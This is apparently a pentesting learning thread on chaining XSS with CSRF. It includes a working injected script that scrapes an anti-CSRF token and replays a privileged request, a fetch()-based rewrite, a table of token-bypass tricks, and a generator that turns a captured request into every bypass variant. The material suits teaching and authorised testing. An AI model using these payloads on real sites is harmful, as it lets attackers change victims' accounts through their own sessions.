In today's episode of "let's spam my timeline with what I'm learning":

#xss and #csrf, or more concretely: XSS & CSRF chaining.

If you missed the last couple of threads about session security, you can check them out here: https://infosec.exchange/@h_ackerman/112762434910128402

Or read up on them in my public learning notes: https://notes.zanidd.xyz/cybersecurity-and-hacking/web/session-security

So, let's start.

1/? 🧵

#hacking #cybersecurity #csrf #crosssiterequestforgery #xss #crosssitescripting #pentesting


To illustrate the technique we have a web app that has same-origin/SameSite protections as well as anti-CSRF tokens in place, but is vulnerable to an XSS attack.


Essentially, we use the XSS to run the CSRF attack from inside the vulnerable site itself: the injected script executes in the victim's browser, on the target origin and with the victim's session, so the cross-site defences no longer get in the way.


But before we hack away, we have to decide what we want to achieve. In this example we will use the exploit to make private profiles public - fancy.


So let's see how this app makes a profile public: toggle the setting in the UI and send the generated traffic through Burp.


In order to replay this request from the victim's browser, we have to "smuggle" the following JS code into the website (via the XSS):

<script>
// Step 1: fetch the page that contains the visibility form. Because this runs
// on the vulnerable origin, the browser attaches the victim's session cookie
// and lets us read the response.
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get', '/app/change-visibility', true);
req.send();

function handleResponse() {
  // Step 2: pull the anti-CSRF token out of the returned HTML.
  var token = this.responseText.match(/name="csrf" type="hidden" value="(\w+)"/)[1];
  // Step 3: replay the state-changing POST with the valid token.
  var changeReq = new XMLHttpRequest();
  changeReq.open('post', '/app/change-visibility', true);
  changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  changeReq.send('csrf=' + token + '&action=change');
}
</script>


Most of the script above just replicates the request; if you're familiar with JS it shouldn't be that hard or surprising, and I'm sure Burp has some kind of feature or extension to convert a request into JavaScript code.

But the interesting part (for me at least) is this line:

var token = this.responseText.match(/name="csrf" type="hidden" value="(\w+)"/)[1];

This line takes the HTML returned by the GET request to /app/change-visibility (this.responseText) and matches it against a regular expression that looks for the hidden input with the attributes name="csrf" and type="hidden" and captures its value attribute: our CSRF token. Note that the pattern expects the attributes in exactly that order; if the page emits them in a different order, match() returns null and the [1] throws.

So even if the token is randomly generated, we can get it, because the script runs on the same origin as the victim's session and the browser hands us the response.
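The same chain, rewritten as an added example (not the script from the thread) around fetch() so it can be run and tested outside a browser. The endpoint /app/change-visibility, the field names csrf and action, and the sample form HTML are assumptions modelled on the thread's own script; the token extraction here tolerates any attribute order, which the original one-liner does not.

```javascript
// Added example, not the thread's original code. Endpoint path, field names
// and the sample HTML are assumptions taken from the thread's script.

// Extract the anti-CSRF token from the HTML of the page carrying the form.
// Looks at every <input ...> tag and reads name= and value= independently,
// so it does not depend on the attribute order the framework emits.
function extractCsrfToken(html, fieldName = 'csrf') {
  const inputTag = /<input\b[^>]*>/gi;
  let m;
  while ((m = inputTag.exec(html)) !== null) {
    const tag = m[0];
    const name = /\bname\s*=\s*["']([^"']+)["']/i.exec(tag);
    if (!name || name[1] !== fieldName) continue;
    const value = /\bvalue\s*=\s*["']([^"']*)["']/i.exec(tag);
    if (value) return value[1];
  }
  return null;
}

// The thread's original pattern, kept for comparison: it only matches when
// name, type and value appear in exactly this order.
function extractCsrfTokenStrict(html) {
  const m = html.match(/name="csrf" type="hidden" value="(\w+)"/);
  return m ? m[1] : null;
}

// Run the chain: GET the form (the victim's session cookie is attached
// automatically because the script executes on the same origin), pull the
// token out of the response, then replay the state-changing POST with it.
// fetchImpl is injectable so the function can be exercised without a browser;
// in the real payload you would pass the browser's global fetch.
async function changeVisibility(fetchImpl, path = '/app/change-visibility') {
  const page = await fetchImpl(path, { credentials: 'same-origin' });
  const token = extractCsrfToken(await page.text());
  if (token === null) {
    throw new Error('no csrf token found in ' + path);
  }
  const body = new URLSearchParams({ csrf: token, action: 'change' }).toString();
  const resp = await fetchImpl(path, {
    method: 'POST',
    credentials: 'same-origin',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body,
  });
  return { token, status: resp.status, body };
}

// Constructed sample page (not captured from a real app). The attribute order
// deliberately differs from the thread's regex, which would miss this token.
const SAMPLE_FORM_HTML = `
<form method="post" action="/app/change-visibility">
  <input type="hidden" value="9cfffd9e8e78bd68975e295d1b3d3331" name="csrf">
  <button name="action" value="change">Make public</button>
</form>`;

// Minimal fake fetch: serves the sample form on GET and records every call.
function makeFakeFetch(log) {
  return async (path, opts = {}) => {
    const method = opts.method || 'GET';
    log.push({ path, method, body: opts.body });
    if (method === 'GET') {
      return { status: 200, text: async () => SAMPLE_FORM_HTML };
    }
    return { status: 302, text: async () => '' };
  };
}

// Stand-alone demo against the fake fetch.
const demoLog = [];
changeVisibility(makeFakeFetch(demoLog)).then((r) => console.log(r, demoLog));
```

The order-independent extractor is the part worth keeping in a real payload: a hard-coded attribute order is the most common reason a copied XSS-to-CSRF script silently does nothing.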


Also, let's not forget that weak CSRF tokens happen as well (very often?):

  • Try to find out how the tokens are generated (e.g. md5(username)); we can check that by logging in and comparing our own CSRF token against candidate hashes

Check for the following and similar "token generation algorithms":

  • md5(username)
  • sha1(username)
  • md5(current date + username)

This can be done with a simple bash command:

echo -n '<username>' | md5sum

etc...


A little overview of protection bypasses

| Type | Explanation | Example |
| --- | --- | --- |
| Null value | Leave the token empty; sometimes the server only checks that the header/field is present | CSRF-Token: |
| Random CSRF token | Replace the real token with a made-up value of the same shape; some servers only validate the format, not the value | Real:<br>CSRF-Token: 9cfffd9e8e78bd68975e295d1b3d3331<br>Fake:<br>CSRF-Token: 9cfffl3dj3837dfkj3j387fjcxmfjfd3 |
| Use another session's CSRF token | Create two accounts and send account A's token with a request in account B's session; works when tokens are not bound to the session | - |
| Request method tampering | Change the request method from POST to GET and move the body into the query string; some frameworks only enforce the token on POST | Original:<br>POST /change_password<br>POST body:<br>new_password=pwned&confirm_new=pwned<br>Fake:<br>GET /change_password?new_password=pwned&confirm_new=pwned |
| Delete token | Remove the token parameter entirely; some checks only run when the parameter is present (it may work) | - |
| Session fixation (double-submit cookie) | If the website keeps the anti-CSRF token in a cookie and in a parameter, it probably isn't storing the token server-side, so set both to a value you choose (you need a way to set the cookie, e.g. the XSS or a subdomain) | POST /change_password<br>Cookie: CSRF-Token=fixed_token;<br>POST body:<br>new_password=pwned&CSRF-Token=fixed_token |
| Regex bypass | Bypass regex-based Origin/Referer whitelists that match a substring instead of the whole host | www.google.com.pwned.zanidd.xyz or something like that |

Don't know how good mastodon handles markdown tables, but you can see it at https://notes.zanidd.xyz/cybersecurity-and-hacking/web/session-security a little better.
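To work through the table systematically, here is an added example (not from the thread) that takes one captured request and generates one variant per row, ready to replay and compare against the baseline response. The captured request, the field name CSRF-Token and the /change_password endpoint are constructed to match the table's own examples.

```javascript
// Added example, not the thread's code. The captured request is a constructed
// sample modelled on the table's rows, not real traffic.

const CAPTURED = {
  method: 'POST',
  path: '/change_password',
  headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
  cookies: { session: 'abc123', 'CSRF-Token': '9cfffd9e8e78bd68975e295d1b3d3331' },
  params: {
    new_password: 'pwned',
    confirm_new: 'pwned',
    'CSRF-Token': '9cfffd9e8e78bd68975e295d1b3d3331',
  },
};

// Deep copy so no variant shares state with the original or with each other.
function clone(req) {
  return JSON.parse(JSON.stringify(req));
}

// Fake token with the same length and alphabet as the real one, so a server
// that only checks the format cannot tell it apart.
function randomLookalike(token) {
  const alphabet = /^[0-9a-f]+$/.test(token)
    ? '0123456789abcdef'
    : 'abcdefghijklmnopqrstuvwxyz0123456789';
  let out = '';
  for (let i = 0; i < token.length; i++) {
    out += alphabet[Math.floor(Math.random() * alphabet.length)];
  }
  return out;
}

function encodeParams(params) {
  return new URLSearchParams(params).toString();
}

// One request per table row. tokenField names the parameter/cookie carrying
// the token; otherToken is a token from a second account's session, or null.
function csrfBypassVariants(captured, tokenField, otherToken = null) {
  const variants = [];

  const nullValue = clone(captured);
  nullValue.params[tokenField] = '';
  variants.push({ name: 'null value', req: nullValue });

  const randomToken = clone(captured);
  randomToken.params[tokenField] = randomLookalike(captured.params[tokenField]);
  variants.push({ name: 'random token', req: randomToken });

  if (otherToken !== null) {
    const other = clone(captured);
    other.params[tokenField] = otherToken;
    variants.push({ name: "other session's token", req: other });
  }

  // POST -> GET: body moves into the query string, token dropped.
  const asGet = clone(captured);
  const qs = clone(captured.params);
  delete qs[tokenField];
  asGet.method = 'GET';
  asGet.path = captured.path + '?' + encodeParams(qs);
  asGet.params = {};
  delete asGet.headers['Content-Type'];
  variants.push({ name: 'method tampering (POST -> GET)', req: asGet });

  const deleted = clone(captured);
  delete deleted.params[tokenField];
  variants.push({ name: 'token removed', req: deleted });

  // Double-submit: cookie and parameter set to the same attacker-chosen value.
  const fixed = clone(captured);
  fixed.cookies[tokenField] = 'fixed_token';
  fixed.params[tokenField] = 'fixed_token';
  variants.push({ name: 'double-submit cookie fixed', req: fixed });

  return variants;
}

// Render a variant as raw HTTP for pasting into Burp Repeater.
function toRawHttp(req, host = 'target.example') {
  const cookie = Object.entries(req.cookies).map(([k, v]) => k + '=' + v).join('; ');
  const body = Object.keys(req.params).length ? encodeParams(req.params) : '';
  const lines = [req.method + ' ' + req.path + ' HTTP/1.1', 'Host: ' + host, 'Cookie: ' + cookie];
  for (const [k, v] of Object.entries(req.headers)) lines.push(k + ': ' + v);
  return lines.join('\r\n') + '\r\n\r\n' + body;
}

for (const v of csrfBypassVariants(CAPTURED, 'CSRF-Token')) {
  console.log('--- ' + v.name + '\n' + toRawHttp(v.req));
}
```

Replay each variant in the same session and diff the responses against the legitimate request; a variant that produces the same success response as the original is a working bypass. The regex-bypass row is about the Origin/Referer header rather than the token, so it is not generated here.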


Alrighty, thanks for joining in on this thread! See you in the next one - I'll be spending the next hour moving my old notes to my public notes 🌟
